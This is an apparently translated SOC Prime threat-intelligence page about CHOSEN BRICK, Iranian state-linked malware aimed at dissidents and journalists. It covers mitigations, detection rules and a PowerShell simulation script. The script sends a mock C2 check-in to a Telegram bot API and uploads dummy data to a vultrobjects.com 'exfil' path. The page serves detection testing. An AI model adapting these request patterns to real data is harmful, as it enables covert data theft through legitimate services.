SOC Prime Bias: High

17 Sep 2026 08:26 UTC

Attacchi informatici iraniani contro dissidenti, attivisti e giornalisti

Author Photo
SOC Prime Team linkedin icon Segui
Attacchi informatici iraniani contro dissidenti, attivisti e giornalisti
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Gli attori sponsorizzati dallo stato iraniano stanno utilizzando il malware CHOSEN BRICK per colpire dissidenti, attivisti e giornalisti in tutto il mondo. Il malware viene distribuito tramite ingegneria sociale su piattaforme come WhatsApp e Telegram, spesso camuffato come applicazioni o file legittimi. Una volta installato, CHOSEN BRICK supporta il furto di dati, la registrazione del microfono e la cancellazione del sistema attraverso il comando e controllo basato su Telegram.

Indagine

L’indagine ha identificato un modello ricorrente di ingegneria sociale seguito dal dispiegamento di CHOSEN BRICK su sistemi Windows. Gli analisti hanno osservato il malware utilizzare bot di Telegram per le comunicazioni C2 e servizi di archiviazione cloud per l’esfiltrazione dei dati. La persistenza è stabilita tramite chiavi specifiche di registro Run, mentre vengono aggiunte esclusioni di Microsoft Defender per aiutare a eludere i controlli di sicurezza.

Mitigazione

Le mitigazioni raccomandate includono il miglioramento della consapevolezza degli utenti sulle tecniche di ingegneria sociale e l’evitamento di software fornito tramite allegati non richiesti. Le organizzazioni dovrebbero anche applicare MFA resistente al phishing, implementare una lista bianca delle applicazioni e mantenere aggiornato il software antivirus. Monitorare connessioni sospette a Telegram e noti fornitori di archiviazione cloud può ulteriormente rafforzare il rilevamento.

Risposta

Se viene rilevata un’attività di CHOSEN BRICK, le organizzazioni dovrebbero collaborare con i loro fornitori IT per esaminare i log degli endpoint per chiavi di registro e percorsi di file associati. Sia i dispositivi aziendali sia quelli personali utilizzati da individui a rischio elevato dovrebbero essere esaminati. I team di sicurezza dovrebbero anche cercare i domini, i nomi di file e altri indicatori tecnici associati alla campagna.

Flusso degli Attacchi

Stiamo ancora aggiornando questa parte.

Rilevazioni

Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (via registry_event)

Team Soc Prime
16 Set 2026

Possibile Abuso di Telegram Come Canale di Comando e Controllo (via dns_query)

Team Soc Prime
16 Set 2026

Uso di Telegram e VultrObjects da parte di CHOSEN BRICK per Comunicazioni Maliziose [Connessione di Rete Windows]

Regole AI di SOC Prime
16 Set 2026

Rilevamento della Persistenza di CHOSEN BRICK tramite Chiave Registro Run [Evento Registro di Windows]

Regole AI di SOC Prime
16 Set 2026

Esecuzione della Simulazione

  • Narrazione & Comandi dell’Attacco: L’avversario cerca di stabilire il comando e controllo (C2) ed esfiltrare dati sensibili. Per eludere gli antivirus tradizionali basati su firme, utilizzano servizi web legittimi. Innanzitutto, l’attaccante esegue un comando per “registrarsi” con il loro server C2 tramite l’API di Telegram (api.telegram.org). Successivamente, l’attaccante simula l’esfiltrazione di un file sensibile caricandolo in un bucket di archiviazione ospitato su vultrobjects.com. Queste azioni sono eseguite tramite richieste web standard per integrarsi con il traffico web crittografato legittimo, sperando di bypassare le ispezioni e di essere catturate solo se specifici IoC sono noti.

  • Script di Test di Regressione:

    # Script di Simulazione: Emulazione di TTP CHOSEN BRICK
    # Questo script simula C2 tramite Telegram ed Esfiltrazione tramite VultrObjects
    
    $C2_Domain = "api.telegram.org"
    $Exfil_Domain = "vultrobjects.com"
    
    Write-Host "[+] Avvio della Simulazione: Emulazione dei TTP di CHOSEN BRICK..." -ForegroundColor Cyan
    
    # 1. Simulare il Check-in del C2 (API di Telegram)
    Write-Host "[*] Fase 1: Simulazione del check-in del C2 verso $C2_Domain" -ForegroundColor Yellow
    try {
        $c2_response = Invoke-WebRequest -Uri "https://$C2_Domain/bot123456:ABC-DEF/getUpdates" -Method Get -ErrorAction SilentlyContinue
        Write-Host "[+] Richiesta C2 inviata." -ForegroundColor Green
    } catch {
        Write-Host "[!] Nota: Connessione fallita (prevista se non c'è internet/proxy), ma dovrebbe comunque essere generata la telemetria." -ForegroundColor Gray
    }
    
    # 2. Simulare l'Esfiltrazione di Dati (VultrObjects)
    Write-Host "[*] Fase 2: Simulazione di esfiltrazione di dati verso $Exfil_Domain" -ForegroundColor Yellow
    $dummy_data = "Queste sono informazioni altamente sensibili in fase di esfiltrazione."
    $dummy_file = "$env:TEMPsensitive_data.txt"
    $dummy_data | Out-File -FilePath $dummy_file
    
    try {
        # Simulando una richiesta PUT a un endpoint di archiviazione cloud
        Invoke-RestMethod -Uri "https://$Exfil_Domain/exfil/data_dump.txt" -Method Put -Body $dummy_data -ContentType "text/plain" -ErrorAction SilentlyContinue
        Write-Host "[+] Richiesta di esfiltrazione inviata." -ForegroundColor Green
    } catch {
        Write-Host "[!] Nota: Connessione fallita (prevista se non c'è internet/proxy), ma dovrebbe comunque essere generata la telemetria." -ForegroundColor Gray
    }
    
    Write-Host "[+] Simulazione completata. Controllare i log del proxy nel SIEM coinvolgendo $C2_Domain e $Exfil_Domain." -ForegroundColor Cyan
  • Comandi di Pulizia:

    # Script di Pulizia
    $dummy_file = "$env:TEMPsensitive_data.txt"
    if (Test-Path $dummy_file) {
        Remove-Item -Path $dummy_file -Force
        Write-Host "[+] Pulizia: File di esfiltrazione fittizio rimosso." -ForegroundColor Green
    } else {
        Write-Host "[!] Pulizia: File fittizio non trovato." -ForegroundColor Yellow
    }